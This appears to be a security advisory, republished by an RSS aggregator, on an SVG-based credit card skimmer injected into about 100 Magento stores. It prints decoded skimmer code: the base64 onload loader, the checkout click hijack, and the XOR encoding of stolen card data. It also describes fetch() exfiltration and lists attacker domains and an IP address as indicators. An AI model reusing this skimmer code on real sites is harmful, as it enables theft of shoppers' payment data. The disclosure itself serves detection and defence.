



















In the early hours of April 7th, nearly 100 Magento stores got mass-infected with a "double-tap" skimmer: a credit card stealer hidden inside an invisible SVG element. Sansec found stolen payment data flowing to six exfiltration domains, five of which are previously unknown. The likely entry vector is the PolyShell vulnerability that continues to affect unprotected Magento stores.
The skimmer shows victims a convincing "Secure Checkout" overlay, complete with card validation and billing fields. After capturing payment details, it silently redirects the shopper to the real checkout page. Most victims never notice.
The attacker injects a 1x1 pixel SVG element into the store's HTML. The onload handler contains the entire skimmer payload, base64-encoded inside an atob() call and executed via setTimeout:
<svg
width="1px"
height="1px"
onload="(()=>{setTimeout(atob('KGZ1bmN0aW9uKCl7IGlm...'),1)})()"
></svg>
This technique avoids creating external script references that security scanners typically flag. The entire malware lives inline, encoded as a single string attribute.
When a shopper clicks any checkout button, the skimmer intercepts the click using useCapture and displays a full-screen modal overlay instead. The overlay includes a "Secure Checkout" header with lock icon, card fields with real-time Luhn validation, and a full billing form. If the shopper selects "Other payment method," the skimmer closes and redirects to the real checkout.
The decoded payload shows how the overlay intercepts checkout navigation:
document.addEventListener(
"click",
function (e) {
var el = e.target.closest('a,button,[role="button"]');
if (!el) return;
var href = el.getAttribute("href") || "";
if (
(href && checkoutUrl.includes(href)) ||
el.getAttribute("data-role") === "proceed-to-checkout" ||
el.id === "top-cart-btn-checkout"
) {
e.preventDefault();
e.stopImmediatePropagation();
show(); // display fake checkout overlay
}
},
true,
); // useCapture: fires before store's own handlers
After the victim submits the form, the skimmer collects all fields and encodes them using XOR with the key "script", followed by base64:
var raw = JSON.stringify(payload),
encoded = "";
for (var i = 0; i < raw.length; i++)
encoded += String.fromCharCode(
raw.charCodeAt(i) ^ "script".charCodeAt(i % 6),
);
var b64Payload = btoa(encoded);
The exfiltration URL itself is double-encoded via nested atob() calls. All six domains use the same endpoint: /fb_metrics.php, disguised as a Facebook analytics tracker. The skimmer sends data via fetch() POST with no-cors mode, falling back to a hidden iframe. After exfiltration, it sets localStorage.setItem('_mgx_cv', '1') to avoid capturing the same shopper twice, and redirects to the real checkout page.
All six domains resolve to 23.137.249.67, hosted at IncogNet LLC (AS40663) in the Netherlands.
| Domain | Confirmed victims |
|---|---|
statistics-for-you.com | 15 |
statistics-renew.com | 14 |
morningflexpleasure.com | 14 |
reusable-flex.com | 12 |
goingfatter.com | 11 |
wellfacing.com | 10 |
| Indicator | Value |
|---|---|
| Injection method | <svg width="1px" height="1px" onload="..."> |
| Payload encoding | base64 via atob(), executed via setTimeout |
| Data encoding | XOR with key "script", then base64 |
| Exfil endpoint | /fb_metrics.php |
| Exfil method | fetch() POST no-cors, fallback hidden iframe |
| localStorage key | _mgx_cv |
| Campaign marker | {site:'rand0m'} in payload array |
| Exfil server | 23.137.249.67 (IncogNet LLC, AS40663, NL) |
<svg elements with onload attributes containing atob(_mgx_cv key in browser localStorage indicates a shopper's payment data was captured此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。